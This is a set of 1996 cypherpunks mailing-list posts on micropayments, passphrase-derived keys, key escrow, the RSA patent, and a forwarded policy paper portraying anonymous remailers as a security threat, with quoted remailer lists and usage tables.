with transactions that allow coupling of the material and the money
in one swipe, such as for a http file download or whatever.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 21 Jun 1996 00:01:11 +0800
To: cypherpunks@toad.com
Subject: HUS_tle
Message-ID: <199606201207.MAA15079@pipe1.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-20-96. NYP: 
 
   "Counterfeiters of a New Stripe Give Japan One More Worry." 
 
      The pachinko caper echoes far beyond Japan, serving as 
      a cautionary tale as the world moves toward digital 
      cash, with money reduced to ones and zeros on a card or 
      in a computer. It could be far easier to manipulate 
      computer codes than to rob a bank or create counterfeit 
      bills. 
 
      "This is a tip-of-the-iceberg problem," said Peter G. 
      Neumann, a computer security hustler at SRI. "You are 
      going to put a lot of money out there and someone is 
      going to figure out how to take it away from you." 
 
      "Electronic money, digital cash, the Internet -- it's so 
      convenient and so many people envision a dreamy future," 
      another sec-hawker drooled. "But once you consider the 
      security, it's quite vulnerable." 
 
 
   http://pwp.usa.pipeline.com/~jya/hustle.txt   (12 kb) 
 
   HUS_tle 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 21 Jun 1996 09:30:40 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: Safemail
In-Reply-To: <199606201529.KAA02594@homeport.org>
Message-ID: <9606201728.AA00969@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>  Not to defend the safemail folks, but this does remind me of
>  something that NeXT did with Eliptic curve based systems;
>  there was no storage of the private key, it was generated from
>  the passphrase at run time.

Yup, NeXT did this with their "For Your Eyes Only" demo and the crypto  
extensions for their Mail application.  Although NeXT used an algorithm  
called "FEE" (Fast Elpitic Encryption), you can do it with RSA by hashing the  
passphrase, seeding a random number generator, generating a random prime,  
etc...  It works but it adds a lot of processing time to encryption and  
decryption.

There are other, more serious, drawbacks to such a scheme though.  You can't  
change your passphrase without changing your public key.  People can try to  
guess your passphrase with only your public key.  Crack can guess peoples  
account passwords something like 24% of the time.  I doubt the average joe  
would use much better passphrases for their secret key.  That's a scary  
thought!!  At least with PGP someone has to get a copy of the encrypted  
secret key first.


One interesting thing about NeXT's software is that the Mail application has  
crypto hooks.  The crypto code is in a drop-in bundle that extends the app  
at runtime.  This isn't just a generic interface, but the internationally  
shipped Mail software calls methods in the external bundle that are  
definitely crypto related.  Also, much of the crypto and key management user  
interface ships with the main Mail package.  It is hidden without the crypto  
bundle, but if you peek around with InterfaceBuilder you can see that it is  
there.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 21 Jun 1996 07:23:49 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Federal Key Registration Agency
In-Reply-To: <Pine.SUN.3.91.960620014132.14548A-100000@infinity.c2.org>
Message-ID: <Pine.3.89.9606201224.B27834-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 20 Jun 1996, William Knowles wrote:

> Keep your PGP262.zip disks in ziplock bags and cache them in the backyard,
> forests,The golf courses.  Get a GPS location and escrow the locations with
> with trusted friends using Secret Share.  Payout to Jim Bell's AP service.  
> Move to Canada?

As was recently demonstrated by the passage of a "designer drug law" whose
main purpose was to increase jail time for pot, which nobody in Canada had
asked for and was widely opposed, when the US wants Canada to pass a law,
Canada passes that law. If Washington gives us GAK, it's little brother
Ottawa won't be too far behind. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 21 Jun 1996 12:33:09 +0800
To: cypherpunks@toad.com
Subject: Re: [SF Bay Area] Security And Freedom through Encryption Forum
Message-ID: <199606201959.MAA00994@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>SAFE: Security And Freedom through Encryption Forum, July 1, 1996
>=================================================================
>   For a national encryption policy that promotes commerce and protects
>   privacy
>   Encryption technologies, the "locks and keys" of the Information Age,
>   are an essential component of a secure and trusted Global Information
>   Infrastructure. Every day, millions of dollars in commercial
>   transactions and the private communications of individuals traverse
>   the global network. All are vulnerable to the prying eyes of
>   industrial spies, hackers, and rogue foreign governments.

I'm more worried about rogue DOMESTIC governments, myself.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Rarey <Paul.Rarey@Clorox.com>
Date: Fri, 21 Jun 1996 10:27:46 +0800
To: www-buyinfo@allegra.att.com
Subject: Re: Micropayments: myth?
In-Reply-To: <199606201905.MAA29199@netcom21.netcom.com>
Message-ID: <960620130516.ZM32734@maverick.clorox.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jun 20, 12:05, Vladimir Z. Nuri wrote:
> Subject: Re: Micropayments: myth?

[ snip ]

>don't people get this? with microcurrency, you don't say to a 
>seller, "bill me for this item". it would rarely work like that at
>all. instead, it is, "here is my money, please give me the item". 

What is the authentication process for the "money" your are "giving" in this 
scenario?

Cheers!
[ psr ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Fri, 21 Jun 1996 09:01:44 +0800
To: Anonymous <nobody@flame.alias.net>
Subject: Re: This might be interesting...
In-Reply-To: <199606190745.JAA21883@basement.replay.com>
Message-ID: <Pine.SCO.3.93.960620131352.11272C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Jun 1996, Anonymous wrote:

> Do an AltaVista Query on:
> 
> 	url:bmh.com crypto*

Mmmmm.  Mmmmm.  Mmmmmm.  Looks pretty tasty.  Those boys and girls at BMH
obviously have fun jobs. 

Anyone have a password for this site?  The links look cool, but you can't
get at 'em without a password or a hack...

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|Protects  - Federal Judges on the CDA    |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RogErick@aol.com
Date: Fri, 21 Jun 1996 08:12:39 +0800
To: declan@well.com
Subject: Take the money, Harry, re.
Message-ID: <960620131908_221438508@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>Harry should take the money.  As Ayn Rand said, "Don't let your morality be
>used against you."
>
>   I believe in the philosophy of law.  As long as it's legal, each person
>can take whatever he is legally entitled to from the government's stolen
>money, as long as he/she doesn't ADVOCATE that the coercive tax system be
>retained.   Many will not take grants, or welfare, but they are legally
>entitled to it.  As for the moral entitlement, that is a matter for them to
>work out for themselves. After all, we have to drive on government (tax
>supported) roads, etc.
>
>Tonie

  I agree with you, Tonie, as usual.
   I struggled with this, for years, until I had a dream.  I was on a 
battlefield, pinned down by enemy fire, and I was out of ammunition.  
There was plenty of slave labor stuff around, on the corpses of enemy 
soldiers, but of course, I couldn't use that, morally,  because it was 
made available by force.
  So I made a decision, and I didn't die in my sleep.

  If libertarians deprive themselves of what is legal, they impoverish 
themselves, relative to the more socialistic others, and the the cancer 
continues to gather strength by taking ours for themselves.
  But that is no reason to continue it in law, when we have the power to 
reverse or negate the law itself, that legalizes theft.
  In a future dream, I will free the slaves with the fruits of their 
forced labor, so they will be forced no more.  I think all libertarians 
fundamentally want to do this.
  So...We need to trust elected libertarians, not to be seduced by 
existing collectivist power, to use it at any and every opportunity, to  
return all power to the individual.   Otherwise, what is the point?
  P.S.  I am unable to afford to go the the National Convention.  Sorry 
to miss seeing all of you who are going.

Roger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 21 Jun 1996 06:21:49 +0800
To: cypherpunks@toad.com
Subject: Access Via Anonymous Re-Mailers (fwd)
Message-ID: <Pine.SUN.3.94.960620132244.17963B-100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 19 Jun 1996 13:38:29 -0400
From: Matthew Gaylor <freematt@coil.com>
To: Matthew Gaylor <freematt@coil.com>
Subject: Access Via Anonymous Re-Mailers

Harvard University, Kennedy School of Government Information Infrastructure
Project

Symposium on the Global Information Infrastructure: Information, Policy &
International Infrastructure Cambridge, MA, January 28-30, 1996

Risk-Free Access Into The Global Information Infrastructure Via Anonymous
Re-Mailers

by Paul A. Strassmann, US Military Academy, West Point; and Senior Advisor,
SAIC  and William Marlow, Senior Vice President, Science Applications
International Corporation (SAIC)

Quoted portions are excerpted from Raph Levien's Remailer List.

The Context

By far the greatest threat to the commercial, economic and political
viability of the Global Information Infrastructure will come from
information terrorists. Information terrorism has ceased to be an amateur
effort and has migrated into the hands of well organized, highly trained
expert professionals. Information terrorist attacks can be expected to
become a decisive element of any combined threat to the economic and social
integrity of the international community. Nations whose life-line becomes
increasingly dependent on information networks should realize that there is
no sanctuary from information-based assaults. Commercial organizations,
especially in telecommunications, finance, transportation and power
generation offer choice targets to massive disruption.

Information terrorism, as a particularly virulent form of information
warfare, is a unique phenomenon in the history of warfare and crime. For
the last two hundred years the theory of warfare has been guided by
"force-exchange" equations in which the outcome was determined by the rate
of attrition of each opposing force. In information attacks these equations
do not apply because the attacker remains hidden and cannot be retaliated
against.

Since biblical times, crimes have been deterred by the prospects of
punishment. For that, the criminal had to be apprehended. Yet information
crimes have the unique characteristic that apprehension is impossible,
since even identification of the criminal is not feasible. Information
crimes can be committed easily without leaving any telltale evidence such
as fingerprints, traces of poison or bullets.

Changes Introduced By Anonymous Re-Mailers

The introduction of Anonymous Re-mailers into the Internet has altered the
capacity to balance attack and counter-attack, or crime and punishment. The
widespread use and easy access to acquiring the capacity to launch
anonymous messages and software has so far not received adequate attention
from a policy and legal standpoint. This topic is sufficiently technical
that it has been largely avoided by experts who have so far concentrated on
debating social, legal, political and economic consequences of the Global
Information Infrastructure. Yet, unless there is a thorough understanding
of the technologies that make the Anonymous Re-mailers sources of a
pathological danger, there is little hope that effective preventive
measures and safeguards can be put in place.

In many respects, the avoidance of technical discussions about some of the
pathological aspects of the Internet remind me of the state of medical
diagnosis prior to the recognition that bacteriology, prophylactics and
inoculation can be only applied following the acceptance of rigorous,
analytic and experimental disciplines.

Our Agenda

The purpose of this paper is to bring to the attention of policy-makers
some of the relevant facts about Anonymous Re-mailers. All of the material
quoted here comes from public sources which are easily accessible to
anyone. The wide-spread current uses of Anonymous Re-mailers should be
sufficient warning that this topic cannot be considered any more as
something hidden, confidential or inappropriate for public discussion.

We find many similarities in the initial denials to the threats from AIDS
by the medical and public health establishment. We are dismayed by the
avoidance of a candid assessment by public officials about the
vulnerability of the Global Information Infrastructure to destructive
information epidemics. The purpose of this paper is to increase the
awareness of potentially deadly risks that may inhibit the potential gains
from the creation of a global information community.

What Is A Re-Mailer?

A re-mailer allows anyone to post messages to newsgroups or to individuals
while remaining anonymous. The identity of the sender is hidden from the
recipient and remains practically untraceable.

An anonymous re-mailer is a program that runs on a computer somewhere on
the Internet. When you send mail to the re-mailer address, the re-mailer
takes your name and your address off of the mail message and forwards it to
its next destination. The recipient gets mail that has no evidence of where
it originally came from, at least not in the headers. You might give away
your secret identity in the body of the message, but that would be the
sender's own fault.

Anonymous re-mailers can be "chained" so that a message is passed on from
one anonymous re-mailer to another, in two or more separate anonymous
"hops" as a way of making physical tracing or monitoring increasingly
difficult.

One of the most prominent anonymous re-mailers is <anon.penet.fi> is in
Finland. It is frequently used by the Russian (ex-KGB) criminal element.
<Anon.penet.fi> assigns a numeric identification to each address from which
it receives mail. Internet recipients can reply to that secret number.
<anon.penet.fi> will also assign to them another anonymous number, and then
forward the reply. This creates a double-blind situation where two people
could have an ongoing exchange and never know who the other person was.
This method of communication is favorite for engaging services of
cybercriminals and for authorizing payment for their acts through a third
party.

<Anon.penet.fi> can be also used to post a message to Usenet as well. The
message can be read by thousands of people, and anyone can send an
anonymous reply to the secret Finnish identity. The readers of this paper
can easily avail themselves of these services without any special training.
Detailed instructions for the use of a remailer service are usually
included in the "help" software posted in the remailer's files. For
example:

To get an anonymous re-mailer address follow the following instruction.
First, you should send mail to: <help@anon.penet.fi>. You'll get back a
nice help file automatically. Next, send mail to <ping@anon.penet.fi>. This
will allocate your number--from now on you'll be something like
<anXXXXXX@anon.penet.fi>, where XXXXXX is your number. Once you have
received your anonymous address you can use it like your normal e-mail
address.

These capabilities are not trivial, but a source of an exhaustive body of
software and communications know-how which can be learned best by
consulting one of the many tutorials about this topic, such
as<ftp.csua.berkeley.edu: /pub/cypherpunks/re-mailer/hal's.remailer.gz>:

Cyberpunk re-mailers allow a person to send mail with no trace of identity.
To use a re-mailer simply do the following:

Add the header Request-Remailing-To: and sending to one of the addresses
listed below. These headers must be typed in exactly. Mail without these
headers is either rejected or delivered to the re-mailer administrators.If
you cannot add the required headers, place two colons (::) on the very
first line of your message, then on the next line type
Request-Remailing-To: and the address you want to send anonymously to. Skip
a line, and then begin the message. By using this method you can send the
message through more than one re-mailer which will certainly ensure that it
will be anonymous. Many re-mailers only allow one recipient per message. A
number of standard Cyberpunk Re-mailers are        available.

There is a wealth of easily accessible step-by-step instructional material
available on the Internet how to use re-mailers and how to evade
countermeasures or possibility of detection from any source. Re-mailer
operators are in frequent contact with each other and exhibit many of the
fraternal habits that previously were shared between amateur radio
operators. Some of the most interesting sources of information are:

André Bacard's anonymous re-mailer FAQ is an excellent nontechnical
introduction.

For a different take on Net anonymity, see L.Detweiler's home page.

Tools

Private Idaho is an anonymous re-mailer utility for Windows, supporting
PGP, the cypherpunks re-mailers,and Mixmaster, and the <alpha.c2.org> alias
server. It too automatically configures itself based on this re-mailer
list.        <ChainMail> is a re-mailer chaining utility for Mac users, by
Jonathan Rochkind. To use it, you need Eudora, MacPGP, and applescript, in
addition to a number of applescript scripting additions. <Privtool> is a
PGP-aware mailer that also supports Mixmaster. The Community ConneXion has
put the Web-premail gateway on its SSL server. That means that you can send
anonymous email from the Web without exposing your message in the clear on
the connection between your Web browser and the gateway. Sameer Parekh's
NEXUS Berkeley / Community ConneXion has a web page set up for sending
anonymous mail from your Web client.        Michael Hobbs has set up Web
gateway to premail. Now you can send anonymous email directly from your Web
browser. Don't use this for extremely sensitive stuff, though, because it
isn't quite as secure as running premail yourself (in particular, the
connection between your Web browser and the gateway is not
encrypted). A good source for re-mailer information is the Anonymity,
re-mailers, and your privacy page compiled by  "Galactus". This is also the
best place to look for information about anon.penet.fi.

Matt Ghio's re-mailer list is available by finger
ingremailer.help.all@chaos.taylored.com. This file also has all the public
keys for PGP-friendly re-mailers. Matt also has a pinging service similar
to this one, available by fingering re-mailer-list@chaos.taylored.com.
Chaos is having problems getting recognized on the Net. Try
re-mailer.help.all@204.95.228.28 and see if that works any better. Newer
information can be gotten by sending mail to
mg5n+re-mailers@andrew.cmu.edu. Help for the Alpha alias server (also
available in a plain email version. This is the best way to create an alias
for anonymous replies to mail. Not only is it the most cryptographically
secure, but you get to pick the alias nickname of your choice. The email
addresses are of the form <alias@alpha.c2.org>. Highly recommended. Usura's
home page has a bunch of re-mailer related stuff on it, including a help
page on chaining re-mailers.       The Armadillo re-mailer now has its own
Web page. Crown re-mailer help and statistics. Ecafe re-mailer has its own
Web page, including quickie info about how to use the re-mailer without
encryption or any other extras.

Other resources

You want to send secure mail to someone, but don't know their key. Where
are you going to get it? Try the keyserver at MIT. Vince Cate's Cryptorebel
and Cypherpunk page has pointers to lots of cypherpunk resources. John
Perry's jpunix page has info on his MX service for hidden re-mailers, as
well as cool links for Mixmaster and other stuff. Lance Cottrell's home
page, which has his Chain script, the Mixmaster re-mailer client (including
Sun        binaries!) as well as other cypberpunk related topics. Vince
Gambino's re-mailer page has a good collection of re-mailer help files.

Where Do You Find Re-Mailers?

Computers that offer remailing capabilities are operated by individuals or
organizations as a public service, almost always at no charge because it
costs so little to set one up. They are available globally. We offer a
partial list of re-mailers:

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub
reord";        $remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk
mix pgp hash latent cut post ek";        $remailer{"flame"} =
"<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash
latent cut ek ksub        reord ?";        $remailer{"syrinx"} =
"<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash
latent cut ek ksub        reord";        $remailer{"robo"} = "<robo@c2.org>
cpunk hash mix";        $remailer{"replay"} = "<remailer@replay.com> cpunk
mix pgp hash latent cut post ek";        $remailer{"spook"} =
"<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash
latent cut";        $remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk
mix";        $remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix
pgp. hash latent cut ek";        $remailer{"shinobi"} =
"<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash
latent cut ek        ksub";        $remailer{"gondolin"} =
"<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';        Much
of the knowledge about the characteristics of these re-mailers is available
from        <remailer-list@kiwi.cs.berkeley.edu>

Role Of Encryption

For added protection, users of Anonymous Re-mailers tend to encrypt their
messages just in case one of the remailing links are compromised. PGP
(Pretty Good Privacy) encryption is favored because it is freely available
and easy to use. A typical digital signature would look like this:

-----BEGIN PGP SIGNATURE-----     Version: 2.6.2

iQCVAwUBMPDy4WV5hLjHqWbdAQEqYwQAm+o313Cm2ebAsMiPIwmd1WwnkPXEaYe9
pGR5ja8BKSZQi4TAEQOQwQJaghI8QqZFdcctVYLm569I1/8ah0qyJ+4fOfUiAMda
Sa2nvJR7pnr6EXrUFe1QoSauCASP/QRYcKgB5vaaOOuxyXnQfdK39AqaKy8lPYbw
MfUiYaMREu4=     =9CJW     -----END PGP SIGNATURE-----

For responses the sender will choose a passphrase. This phrase will be used
to encrypt messages sent back to you. The encryption will be single-key
encryption, not PGP's normal public-private key encryption. The reason for
this is that public key encryption is usually not necessary in such cases.
Single-key encryption does not require a database (such as in the widely
used <anon.penet.fi> database for mapping aliases onto addresses), thus
increasing the security of communications among anonymous users.

When a recipient responds to the e-mail, his response will be encrypted
with the sender's pass-phrase. The sender can read the response by saving
it to a file and using PGP on it. PGP will ask for the passphrase, enter
the sender's reply, which will make it possible for the recipient to see
the response to the e-mail. This feature allows both parties to be securely
encrypted, protecting privacy and anonymity in both directions.

How Reliable Are The Re-Mailers?

The knowledge about the characteristics, reliability and trustworthiness of
re-mailers is widely distributed through various bulletin boards. These are
consulted by persons deeply immersed in Internet-related developments.
There is an agile and very active global community that keeps track of the
average latency time, uptime of frequently used re-mailers. They post their
findings, which in many cases is superior to what a commercial customer is
likely to find out about their own data center performance, or about the
service quality offered by Compuserve, America-On-Line of Prodigy. Here is
an excerpt from such a bulletin:

hacktic  remailer@utopia.hacktic.nl       **** *******     7:10  99.85% c2
remail@c2.org                    -.-++ ++-.-+  2:10:42  99.83%
rmadillo remailer@armadillo.com           +++++ ++++++    37:03  99.69%
flame    remailer@flame.alias.net         ** * *******    14:55  99.64% mix
mixmaster@remail.obscura.com     _ _-__...-++ 17:40:48  99.21% amnesia
amnesia@chardos.connix.com        -+ +--+---   2:04:43  99.20% ecafe
cpunk@remail.ecafe.org           ## ##-## #--  1:26:54  99.06% extropia
remail@extropia.wimsey.com       .- -.----_. 13:48:11  99.04% replay
remailer@replay.com               + +** *****     5:36  98.84% shinobi
remailer@shinobi.alias.net       -- -- - - +     54:43  98.78% spook
remailer@valhalla.phoenix.net    *  ***** - *    35:07  98.36% vishnu
mixmaster@vishnu.alias.net       **      #-*#     7:44  98.20% bsu-cs
nowhere@bsu-cs.bsu.edu              #  # ##.#    28:07  97.78% gondolin
mix@remail.gondolin.org           - --_.----   9:45:55  97.62% wmono
wmono@valhalla.phoenix.net          **  *   *    12:23  97.57% hroller
hroller@c2.org                   #*+### -.. #  1:37:24  96.71% ford
remailer@bi-node.zerberus.de     ._...--._.  21:21:22  95.83% portal
hfinney@shell.portal.com         ########*#      27:36  95.55% alumni
hal@alumni.caltech.edu           #     # *  +    25:47  95.29% penet
anon@anon.penet.fi                  . -- --   13:55:20  87.78% rahul
homer@rahul.net                  +* *+**+*  #     4:34  93.71% robo
robo@c2.org                       #-##            5:59  27.86% History key
# response in less than 5 minutes.   * response in less than 1 hour.   +
response in less than 4 hours.   - response in less than 24 hours.   .
response in less than 2 days.

Specialization Of Services

The operators of various re-mailers are specialized in that they cater to
select communities of Internet dwellers. They offer unique services to
customers who are seeking different degrees of anonymity. Cognoscenti in
the field can readily identify remailers who offer meets diffferent tastes
and preferences. Here is an example of remailer characterizations:

<cpunk> A major class of remailers. Supports Request-Remailing-To: field.
<eric> A variant of the cpunk style. Uses Anon-Send-To: instead. <penet>
The third class of remailers (at least for right now). Uses X-Anon-To: in
the header. <pgp> Remailer supports encryption with PGP. A period after the
keyword means that the short name, rather than the full email address,
should be used as the encryption key ID. <hash> Supports ## pasting, so
anything can be put into the headers of outgoing messages. <ksub> Re-mailer
always kills subject header, even in non-pgp mode. <nsub> Re-mailer always
preserves subject header, even in pgp mode. <latent> Supports Matt Ghio's
Latent-Time: option. <cut> Supports Matt Ghio's Cutmarks: option. <post>
Post to Usenet using Post-To: or Anon-Post-To: header. <ek> Encrypt
responses in reply blocks using Encrypt-Key: header. <special> Accepts only
pgp encrypted messages. <mix> Can accept messages in Mixmaster format.
<reord> Claims to foil traffic analysis by reordering messages. <mon>
Re-mailer has been known to monitor contents of private email. <filter>
Re-mailer has been known to filter messages based on content. If not listed
in conjunction with <mon>, then only messages destined for public <alpha>
Supports nyms according to the protocol used by alpha.c2.org. This list
will be featuring reliability and latency measurements soon for these
nymservers.

A fascinating example of specialization is a re-mailer service advertising
the capacity to defeat "traffic analysis" used by intelligence agencies.
All mail to each destination is first sent through <remail@sitename> which
is a standard "cypherpunk" re-mailer with PGP with a few added features.
The outgoing mail is not forwarded immediately upon receipt. Outgoing
messages are stored in a pool until five minutes after each hour, when all
messages in the pool are re-transmitted in a random order, ignoring the
order in which they came in. Each message from the re-mailer is sent
through a random path of other re-mailers in the re-mailernet. This usually
involves between five to 20 "hops" from one re-mailer to another. In each
case care is taken for at least one of the "hops" to be in a country with
especially relaxed laws concerning electronic messages. Such measures would
greatly complicate any tracing that may be contemplated by a
law-enforcement agency.

Why Re-Mailers?

E-mail is as fast and casual as a voice phone call, but can be stored and
retrieved with infinitely greater efficiency than paper letters or taped
conversations. An e-mail message can be re-broadcast the world over, by
anyone who comes across a copy of the transmission. Parts of any message
can be extracted, edited and easily modified. Meanwhile, the e-mail address
of the originator remains a label of its origin. If the storage of that
message is not protected - and it rarely is - it can be accessed by anyone
who takes the trouble to rummage through any of the many archived computer
records that may have received such message. A casual e-mail exchange, with
an identifying address, can be then used to compromise the originator. As
e-mail traffic takes over an ever increasing share of personal
communications, inspection of e-mail traffic can yield more comprehensive
evidence than just about any wire-tapping efforts. E-mail-tapping is less
expensive, more thorough and less forgiving than any other means for
monitoring personal communications. Without protection of privacy, browsing
through e-mail archives would become the preferred way for gathering
evidence in law enforcement cases. It would also be used as the favorite
means for collecting incriminating statements by lawyers engaged in civil
litigation.

In casual e-mail exchanges it is easy to make an error. When the message is
archived it could be used to haunt a person for decades afterwards. A
message intended for a particular individual may be passed on to hundreds
or even thousands of others. Unless its origin is anonymous, all e-mail can
be traced through identifying addresses that preserve the name of the
originator - as well as the names of those who forwarded it - wherever the
message traversed. Unless a message is handled anonymously, a trace is left
about everyone who received it or passed it on. It would be like a letter
that not only identifies the name and address of its author, but also
fingerprints of anyone who ever touched it.

It is one of the fundamental strengths of the Internet that it offers an
almost universal capacity for free expression of ideas. A person's opinions
can be sent anywhere in the world in a matter of minutes, with the
originator's name displayed at the top. Is it consistent with the rights to
individual privacy and freedom of expression to have one's name clearly
associated with a message than may be easily disseminated to unintended
recipients?

The issues here are the rights to the freedom of speech and to the rights
to personal privacy. Having the right to free speech may work well in the
case of verbal expression, but it may cease to have its intended purpose in
face of retaliation that may take place decades later. In a system that
theoretically can have infinitely large memory and indefinitely long
remembrance, the freedom of expression and become abused and perverted by a
government that does not respect individual rights.

With the widespread acceptance of Internet-mediated communications it was
recognized that the simplest way of securing privacy is through anonymity.
That's how anonymous re-mailers came into being. Given the technical
characteristics of Internet, there is nothing to prevent anyone to set up a
private (or public) anonymous remailing service. Any attempt to prohibit or
regulate the use of anonymous re-mailers is technically unfeasible. In a
democratic society it becomes politically unacceptable to suppress
remailers as potential sources of criminal acts. Such absolute prohibitions
would never pass through a legislative process in a free society.

Conclusion

Anonymous re-mailers are here to stay. Like in the case of many virulent
diseases, there is very little a free society can do to prohibit travel or
exposure to sources of infection. The best one can do is to start treating
the pathologies inherent in the Internet in the same way as we have learned
to deal with infectious epidemics. That calls for constructing new
institutions and processes that are analogues to inoculation, immunization,
prophylactics, clean water supply, sewers, hygiene, early detection of
outbreaks of diseases, quarantine, the offices of health examiners, the
Center of Disease Control and the World Health Organization.

The introduction of most of these restrictive means, imposed mostly by
government, were often opposed by those who saw in public health
injunctions infringement of individual rights. In due course an informed
electorate found it expedient to accept most of the sanitary measures for
disease control a bargain that was well worth it.

The history of public health teaches us that suppression of any disease
must be preceded by a thorough understanding of its behavior, its method of
transmission and how it creates its own ecology. As in the case of
smallpox, yellow fever, flu epidemics, AIDS or malaria, it will take
disasters before the public may accept that some forms of restrictions on
the electronic freedom of speech and privacy may be worthwhile.

It was the purpose of this paper to explain the characteristics of
anonymous remailers as one of the potential sources of infectious threats
to the well-being of our information-based civilization. We trust that this
will be seen as a useful contribution to an already raging debate of how to
find a balance between the desirable and the dangerous.

Paul@Strassmann.com and William_Marlow@cpqm.saic.com will be pleased to
respond to identifiable commentators on the points of view expressed
herein.



****************************************************************************
Subscribe to Freematt's Alerts: Pro-Individual Rights Issues
Send a blank message to: freematt@coil.com with the words subscribe FA
on the subject line. List is private and moderated (7-30 messages per week)
Matthew Gaylor,1933 E. Dublin-Granville Rd.,#176, Columbus, OH  43229
****************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: me@muddcs.cs.hmc.edu (Michael Elkins)
Date: Fri, 21 Jun 1996 10:28:04 +0800
To: exalt@miworld.net (Intense)
Subject: Re: Current status of RSA patent...
In-Reply-To: <Pine.LNX.3.91.960620105421.115A-100000@invictor.miworld.net>
Message-ID: <199606202028.NAA18713@muddcs.cs.hmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Intense writes:
> does not matter - it will be renewed in the interest of the government
> The goverment want's there backdoor...  would you expect less?
> 
> the only pgp I will use is that from MIT
> it has no back door

This does not make sense...  If you believe that RSA has a back door, then
PGP _must_ have a back door because PGP uses it!  It does not matter if
it was independently coded and reviewed.  There could still be a back door
if it was made that way intentionally.

me
-- 
Michael Elkins <me@cs.hmc.edu>			http://www.cs.hmc.edu/~me
PGP key fingerprint = EB B1 68 32 3F B5 54 F9  6C AF 4E 94 5A EB 90 EC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Einar Stefferud <Stef@nma.com>
Date: Fri, 21 Jun 1996 13:24:56 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Micropayments: myth?
In-Reply-To: <199606201905.MAA29199@netcom21.netcom.com>
Message-ID: <16750.835302666@odin.nma.com>
MIME-Version: 1.0
Content-Type: text/plain


Hmmm,,, In general, when someone says something this is misunderstood,
it is upon the speaker to make it understandable, though it of course
helps if the listener is trying to understand.

Shall we continue to argue about which of us are being responsible
speakers/listeners, or disucuss the subject at hand.

I fear that I did not see in yoru text any mention of requiring the
transfer of microcurency during the transaction.  Yes, of course, if
you solve the microcurrency problem, so that I am actually
transferring value while my "gas gauge" is measuring the flow.

But, without a solution to the microcurrency problem, you are speaking
in entirely hypothetical terms.  

This started as a discussion of micro-charging and micro-payment, and
now is a discussion of micro-currency, ala eCash.  As such, I have
nothing to contribute;-).,..

I somehow missed the conversion signals;-)...Cheers...\Stef

>From your message Thu, 20 Jun 96 12:05:55 -0700:
}
}
}more dazed and confused responses on microcurrency... why are people
}making this so complicated???
}
}From: Einar Stefferud <Stef@nma.com>
}>
